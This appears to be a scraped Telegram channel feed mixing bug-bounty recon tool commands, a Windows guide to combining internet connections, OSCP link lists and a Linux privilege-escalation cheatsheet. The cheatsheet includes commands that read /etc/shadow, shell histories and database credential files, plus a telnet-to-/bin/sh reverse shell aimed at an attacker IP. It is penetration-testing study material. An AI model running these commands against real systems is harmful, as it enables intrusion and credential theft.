Jason Haddix is a Famous Bug Hunter and He Shared our Bug hunting Methodology V4


Article Link - https://freelearningtech.in/jhaddix-bug-bounty-methodology-v4/


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Before you read this post first you read our other posts because our all posts are linked with each other.

Post 1 - https://t.me/freelearningtech/304

Post 2 - https://t.me/freelearningtech/311

Post 3 - https://t.me/freelearningtech/319

Post 4 - https://t.me/freelearningtech/349

Here we will tell you Github Recon. Github Recon is very helpful in Bug Hunting. Here we will explain about Github Recon.

Article Link - https://freelearningtech.in/github-dorking-and-github-recon/

Here we will tell you about githound tool First you save your github username and password in config file like this

Config file link - https://github.com/tillson/git-hound/blob/master/config.example.yml

# Required
github_username: "tillson"
github_password: "a8ueifjq4jkasdfoiulk"
# Optional
github_totp_seed: "ABCDEF1234567890" # Obtained via https://github.com/settings/two_factor_authentication/verify

Command - git-hound --workingsubdomain-file /root/Desktop/githubresults.txt (put a path where you can save output)

Tool Link - https://github.com/tillson/git-hound

Second Tool Link - https://github.com/obheda12/GitDorker

If you got any problem for using then leave comment we will help you

Waiting for our Next Post

Thankyou............


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Before you read this post first you read our other posts because our all posts are linked with each other.

Post 1 - https://t.me/freelearningtech/304

Post 2 - https://t.me/freelearningtech/311

Post 3 - https://t.me/freelearningtech/319

Post 4 - https://t.me/freelearningtech/349

Post 5 -https://t.me/freelearningtech/363

How to find Subdomain Takeover Vulnerability

Article Link - https://freelearningtech.in/how-to-find-subdomain-takeover-vulnerability/

Command - ./subzy -targets /home/nikhil/Desktop/yourtarget/worksubdomain.txt | tee -a /home/nikhil/Desktop/yourtarget/subzy.txt (put a path where you can save output)

Tool Link - https://github.com/LukaSikic/subzy

Alternative Tool Link - https://github.com/m4ll0k/takeover

First you Clone this tool then run this command (go build subzy.go)

How to take screen shots of your target Subdomains.

First you install eyewitness tool

Command - Sudo apt-get install eyewitness

Comamnd - eyewitness --web -f /home/nikhil/Desktop/yourtarget/worksubdomain.txt -d /home/nikhil/Desktop/yourtarget/eyewitness (put a path where you can save output)

Thankyou...........

Waiting for our next post


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

How to combine two Wifi Connections to get a faster Internet

You have more than one active internet connections and you are using only one at a time, while the other is resting? Don't let it be lazy. Combine them all to get combined internet speed. Say you have two connections of 1 Mbps each, you just can make 1+1=2. This can work regardless of the type of the connections, i.e. it may be wired, wireless or mobile communication.


Method 1 of 4: Combining LANs
Steps:
1. Turn everything on your computer, modems (in case of DSL).
2. Connect them on the relative ports.
3. Establish Connections. Dial or do whatever you need to do to establish an Internet connection and test each one by one separately. If all good proceed to the next step.
4. While each one is active and connected, navigate to the "Network Devices" folder of your computer. It usually stays under control panel.

Windows 8 or Windows 8.1, press Windows D to navigate to the desktop, and the rest is the same as windows 7 below.

For Windows 7 and Vista, Click the network icon on the task bar-> then click \ Open Network and Sharing Center\ . Then click \ Change Adapter settings\

5. Review the Connections. Review the window showing all of your network connections.
6. Drag and select. Drag and select Active LAN (Wired, Wireless or DSL Modem) connections.
7. Right click on one of the selected-> click "Bridge Connections." Then wait and a network bridge with different icon will appear. You might have to provide administrative right.


*Method 2 of 4: Load Balancing*
If you connect 2 internet connection to Windows at a time, the operating system automatically selects one connection as primary and uses others as as failover connection mode. You can force Windows 7, 8 to use both connections simultaneously using a simple trick.

Steps:
►Open Network and Sharing Center > Change Adapter Settings
►Go to properties of any of your active Internet connection whether it be LAN, WiFi or 3G/4G.
►Select Internet Protocol TCP/IP Version 4, Open its properties, then go to advanced.
►Uncheck the Automatic Metric and type “15”.
►Repeat same steps on other Internet connections you want to combine.
►Restart your Computer.


Method 3 of 4:Using Connectify Hotspot
Steps:
►Download the Connectify Dispatch
►Install the Dispatch software.
►Run. Then click "Start Dispatch".
►Connect all your modems or network connections


Method 4 of 4: Using Speedify
Steps:
►Speedify is a new cloud service from the makers of Connectify, that lets you easily combine multiple WiFi, 3G/4G, and wired networks to create one faster and more reliable Internet connection.
►Visit [www.speedify.com] to begin your free, 3-day trial. Once your trial has started, you will receive an email with your login and a download link for the Speedify client software (for Mac OS X+ & PC)
►Install the Speedify software and then simply enter the email and password that you received from Speedify to log into the Speedify server netwok
►Click the 'Speed Me Up' button to log in. Speedify will automatically connect you to the nearest and fastest Speed Server to ensure that you get the maximum speed and reliability of your Internet connections combined.
►Now, just ensure that you have two or more WiFi, mobile broadband, or wired Internet connections active on your computer, and Speedify does the rest:
►Connect all your modems or network connections.


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Before you read this post first you read our other posts because our all posts are linked with each other.

Post 1 - https://t.me/freelearningtech/304

Post 2 - https://t.me/freelearningtech/311

Post 3 - https://t.me/freelearningtech/319

Post 4 - https://t.me/freelearningtech/349

Post 5 - https://t.me/freelearningtech/363

Post 6 - https://t.me/freelearningtech/369

How to find vulnerabilities in a website using nuclei

Tool Link - https://github.com/projectdiscovery/nuclei

Template link - https://github.com/projectdiscovery/nuclei-templates

You can use different templates for finding vulnerabilities in a website

Command - cat workingsubdomain.txt | nuclei -t /home/nikhil/Desktop/nuclei-templates/fuzzing/adminer-panel-fuzz.yaml (put a path which template you can use)

Sublert is a tool which is help you for getting new added subdomains.

Tool Link - https://github.com/yassineaboukir/sublert

How to use sublert tool read this - https://medium.com/@yassineaboukir/automated-monitoring-of-subdomains-for-fun-and-profit-release-of-sublert-634cfc5d7708

Thankyou..........................

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩

Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release


What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

https://medium.com/@Bhichher/open-redirect-vulnerability-some-common-payloads-fd1dcd73541c


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

https://github.com/curated-intel/Initial-Access-Broker-Landscape


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

OSCP_Helpful_Links.md

OSCP Course Review
Offensive Security’s PWB and OSCP — My Experience
http://www.securitysift.com/offsec-pwb-oscp/

OSCP Journey
https://scriptkidd1e.wordpress.com/oscp-journey/

Down with OSCP
http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/

Jolly Frogs - Tech Exams (Very thorough)

http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html

OSCP Inspired VMs and Walkthroughs
https://www.hackthebox.eu/

https://www.root-me.org/

https://www.vulnhub.com/

Walk through of Tr0ll-1 - Inspired by on the Trolling found in the OSCP exam
https://highon.coffee/blog/tr0ll-1-walkthrough/
Another walk through for Tr0ll-1
https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/
Taming the troll - walkthrough
https://leonjza.github.io/blog/2014/08/15/taming-the-troll/
Troll download on Vuln Hub
https://www.vulnhub.com/entry/tr0ll-1,100/

Sickos - Walkthrough:
https://highon.coffee/blog/sickos-1-walkthrough/
Sickos - Inspired by Labs in OSCP
https://www.vulnhub.com/series/sickos,70/

Lord of the Root Walk Through
https://highon.coffee/blog/lord-of-the-root-walkthrough/
Lord Of The Root: 1.0.1 - Inspired by OSCP
https://www.vulnhub.com/series/lord-of-the-root,67/

Tr0ll-2 Walk Through
https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/
Tr0ll-2
https://www.vulnhub.com/entry/tr0ll-2,107/

Cheat Sheets
Penetration Tools Cheat Sheet
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Pen Testing Bookmarks
https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md

OSCP Cheatsheets
https://github.com/slyth11907/Cheatsheets

CEH Cheatsheet
https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf

Net Bios Scan Cheat Sheet
https://highon.coffee/blog/nbtscan-cheat-sheet/

Reverse Shell Cheat Sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/

NMap Cheat Sheet
https://highon.coffee/blog/nmap-cheat-sheet/

Linux Commands Cheat Sheet
https://highon.coffee/blog/linux-commands-cheat-sheet/

Security Hardening CentO 7
https://highon.coffee/blog/security-harden-centos-7/

MetaSploit Cheatsheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/

Windows Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=6

Linux Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=5

Metasploit Cheat Sheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

A bit dated but most is still relevant

http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html

NetCat

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf

http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf

http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

http://h.ackack.net/cheat-sheets/netcat

Essentials
Exploit-db
https://www.exploit-db.com/

SecurityFocus - Vulnerability database
http://www.securityfocus.com/

Vuln Hub - Vulnerable by design
https://www.vulnhub.com/

Exploit Exercises
https://exploit-exercises.com/

SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads
https://github.com/danielmiessler/SecLists

Security Tube
http://www.securitytube.net/

Metasploit Unleashed - free course on how to use Metasploit
https://www.offensive-security.com/metasploit-unleashed/

0Day Security Enumeration Guide http://www.0daysecurity.com/penetration-testing/enumeration.html

Github IO Book - Pen Testing Methodology
https://monkeysm8.gitbooks.io/pentesting-methodology/

Hey all of you ❤️❤️❤️

We know you are interested in cyber security We have a offer for all of you

❤️❤️❤️❤️If you help poor peoples on This diwali and share pics in our chat group @freelearningtech21 then we will make a videos for you about cyber security and share in our group free of cost❤️❤️❤️❤️


❤️❤️❤️❤️Don't waste your money on Firecrackers , Make diwali of the same money with the poor peoples❤️❤️❤️❤️


Thanks...................


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

👉👉👉Acquisitions

Let's understand Acquisition by giving you example as if your target is google.com, if we find the acquisitions of google.com, then we get more domains that google has acquired, here if you can access the server through that domain. In this case it can be useful for you.To do all this, this website helps you


https://www.crunchbase.com/

First you have to search your target on searchbox like (google) after that then you see the Acquisitions options click on that

There you can get more domains that google has acquired

👉👉👉ASN Enumeration

All companies or organization have their own unique ASN no which the identity of that company. In this case, subdomains can also be found using the same ASN no, but first you have to find ASN no, for this you can use the website

https://bgp.he.net/

When you got asn no for your target then go to kali linux and use amass tool

Command - amass intel -asn 55023

After use this command you see you get a more subdomains of your target


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/